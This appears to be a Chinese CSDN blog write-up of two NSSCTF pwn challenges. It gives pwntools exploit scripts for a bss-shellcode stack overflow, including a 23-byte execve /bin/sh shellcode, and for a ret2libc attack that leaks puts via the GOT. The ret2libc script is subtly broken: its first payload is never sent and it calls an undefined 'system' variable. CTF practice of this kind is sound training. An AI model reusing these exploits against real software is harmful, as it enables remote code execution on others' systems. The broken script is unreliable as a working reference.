NSSCTF(PWN)4

最新推荐文章于 2024-10-30 13:57:55 发布
最新推荐文章于 2024-10-30 13:57:55 发布
阅读量309 收藏 1
点赞数 8
文章标签: linux 前端 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142648138
版权

[GDOUCTF 2023]Shellcode

使用checksec发现这是64位文件

查看main函数发现这题涉及到了栈溢出

我们点开第一个read,name发现位于bss段中,就想到这里涉及到了shellcode,但是使用 shellcraft 默认生成的字节数是 44 字节,这里最大输入数才25字节,所有不能使用默认生成

这里我们就是涉及到了一个64 位 较短的shellcode 23字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

找到了方法,我们接着找栈溢出点在哪里

第二个read的buf为栈溢出点,因为他不能直接读写,我们只能先第一个shellcode注入,然后第二个在溢出

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node4.anna.nssctf.cn','28981')
bss = 0x6010A0
padding = b'a'*(0xA+0x8)
io.recvuntil(b'Please.')
shellcode = '\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
io.sendline(shellcode)
io.recvuntil(b'start!')
payload = padding + p64(bss)
io.sendline(payload)
io.interactive()

[2021 鹤城杯]babyof

使用checksec发现这是一个64位文件

打开main函数,发现这里有个sub_400632双击进入

典型栈溢出

发现这题没有system和binsh,这题涉及到了ret2libc

这道题需要用到rdi和ret

exp:

from pwn import *
from LibcSearcher import *
io = remote('node4.anna.nssctf.cn','28146')
elf = ELF('/home/xp/tm/bin/b')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x400632
ret = 0x400506
rdi = 0x400743
padding = b'a'*(0x40+0x8)
io.recvuntil(b'overflow?')
payload = padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
put = u64(io.recvuntil(b'\x7f', timeout=5)[ -6:].ljust(8, b'\x00'))
print(hex(put))
libc = LibcSearcher('puts',put)
base = put - libc.dump('puts')
sys = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')
payload1 = padding + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
io.sendline(payload1)
io.interactive()

樊少泽
关注
mrctf2020_shellcode详解
勿山几已
06-09 699
简单演示mrctf2020_shellcode解题步骤
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1985
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
NewStarCTF 2023 公开赛道 Week1
Fab1an的博客
10-02 3091
首先要通过Level 1 ,发现它是PHP的弱类型比较,只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等。数组为空,那么MD5加密之后都为0,那么就是相等的,满足条件,可以成功绕过。那么接下来需要绕过if(!打开之后,是一个登录界面,试一下管理员账号admin,密码123456,登录失败,那么我们抓包,然后爆破一下密码。
NewStarCTF 2024 公开赛道 Week1,2024年最新已整理成文档
2401_83947398的博客
04-18 991
首先要通过Level 1 ,发现它是PHP的弱类型比较,只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等。文件头错误了,把它改正回来,文件为也要是504B,之后,把后缀改为.zip,解压后获得另外一个压缩包flag.zip。使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
NewStarCTF 2024第一第二周部分wp
2301_79704829的博客
10-22 1268
2024NewStarCTF 第一第二周wp
2024-NewStarCTF-WEEK1
2301_80185313的博客
10-10 1236
2024-NewStarCTF-WEEK1 wp
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 785
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1768
这不是欺负老实人嘛~
nssctf pwn
10-24
NSSCTF (National Security Service CTF) 是一种网络安全比赛,其中pwn (Payload Writing and Exploitation) 题目通常涉及漏洞利用和内存安全相关的挑战。在这样的竞赛中,参赛者需要找到程序中存在的安全漏洞,如...
[BUUCTF]Pwn刷题记录
x0r
10-13 261
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
PWN要点记录
m0_51246873的博客
09-23 143
PWN 要点
【ctf】 关于确定靶机上的libc版本
qq_31808893的博客
02-07 461
记录一下经验,有时候通过泄露的单一地址 如 puts printf 等用工具查或者手动查会查出很多libc版本,一个个试是一种办法,不过有一种方法可以更精确确定libc版本。
NewStarCTF2024-Week2-Misc-WP
Welcome To Myon'Blog !
10-16 1337
这个是 Windows 早期使用的 LM 哈希,通常较弱,容易被破解。在现代系统中一般用 aad3b435b51404eeaad3b435b51404ee 表示未启用(即空值)。我们需要爆破第二个的 hash,NTLM 算法生成的哈希值
[BUUCTF]PWN——mrctf2020_shellcode
mcmuyanga的博客
01-08 1441
mrctf2020_shellcode 附件 步骤: 例行检查,64位程序,开启了relro和pie,没有nx,肯定是用shellcode最方便了 本地试运行一下,看看大概的情况 64位ida载入,根据运行时看到的字符串,迅速定位到关键程序,但是没法f5成伪代码,直接看汇编 栈大小是0x410,读入了0x400,无法造成溢出覆盖返回地址 不过好像这边分析了用处也不大,直接利用pwntools生成shellcode发送即可 shellcode=asm(shellcraft.sh()) exp fr
*CTF——shellcode
weixin_34186128的博客
04-28 737
一看题目是利用shellcode解决问题 伪代码: EXP: from pwn import* context(os='linux',arch='amd64',log_level='debug') p = process('./shellcode') shellcode ='s\x00'+ asm(shellcraft.sh()):i,j指针同时指向s,跳出内循环,\x0...
Linux】操作系统初步理解与Linux指令入门
2303_80828380的博客
10-27 707
Ubuntu 22.04 server 64bit环境
【ShuQiHere】Linux 桌面环境:选择与定制指南 ️✨
ShuQIHere的博客
10-26 1258
Linux 桌面环境(Desktop Environment,简称 DE)是用户与操作系统交互的图形界面。它不仅决定了系统的外观和感觉,还影响着用户的工作效率和使用体验。无论你是新手还是资深用户,选择和定制适合自己的桌面环境都是提升 Linux 使用体验的重要一步。本文将带你全面了解 Linux 桌面环境的基本概念、常见类型、选择技巧以及定制方法。🚀
Linux tac命令‌
最新发布
weixin_37788102的博客
10-30 294
tac命令实际上是cat命令的一个变体,尽管它的功能相对简单,但在某些情况下非常有用。例如,当需要查看文件的最后一行(通常是标题或总结)时,使用tac命令可以避免滚动查看整个文件。此外,tac命令对于处理大型文件或需要快速定位文件末尾内容的情况非常有用‌。‌Linux tac命令‌是一个用于逆序显示文件内容的工具,其名称来源于“cat”的反向拼写。tac命令的基本功能是将文件的内容从最后一行开始输出,直到第一行结束,这与cat命令的功能相反,cat命令是从第一行开始输出直到最后一行。tac命令的基本用法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值